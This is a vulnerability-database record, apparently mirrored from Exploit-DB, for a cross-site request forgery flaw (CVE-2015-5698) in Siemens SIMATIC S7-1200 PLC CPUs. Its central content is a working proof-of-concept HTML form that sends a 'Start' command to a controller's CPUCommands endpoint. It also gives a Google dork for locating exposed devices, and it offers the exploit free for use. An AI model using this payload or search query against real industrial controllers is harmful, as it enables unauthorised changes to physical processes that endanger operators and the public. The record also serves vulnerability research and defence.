Sign-up

ID

VAR-E-201805-0465


EDB ID

44667


TITLE

Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery - Linux webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 44667

DESCRIPTION

Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery. CVE-2015- 5698 . webapps exploit for Linux platform

Trust: 0.6

sources: EXPLOIT-DB: 44667

AFFECTED PRODUCTS

vendor:siemensmodel:simatic s7-1200 cpuscope: - version: -

Trust: 1.6

sources: EXPLOIT-DB: 44667 // EDBNET: 97818

EXPLOIT

# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698

# 1. Proof of Concept

<form method="POST" action="http://targetIp/CPUCommands">
<input name="PriNav" value="Start">
<input type="submit" value="Go!">
</form>

Trust: 1.0

sources: EXPLOIT-DB: 44667

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 44667

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44667

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 44667 // EDBNET: 97818

TAGS

tag:Cross-Site Request Forgery (CSRF)

Trust: 1.0

sources: EXPLOIT-DB: 44667

CREDITS

t4rkd3vilz

Trust: 0.6

sources: EXPLOIT-DB: 44667

EXTERNAL IDS

db:EXPLOIT-DBid:44667

Trust: 1.6

db:EDBNETid:97818

Trust: 0.6

sources: EXPLOIT-DB: 44667 // EDBNET: 97818

REFERENCES

url:https://www.exploit-db.com/exploits/44667/

Trust: 0.6

sources: EDBNET: 97818

SOURCES

db:EXPLOIT-DBid:44667
db:EDBNETid:97818

LAST UPDATE DATE

2022-07-27T09:39:55.307000+00:00


SOURCES RELEASE DATE

db:EXPLOIT-DBid:44667date:2018-05-21T00:00:00
db:EDBNETid:97818date:2018-05-21T00:00:00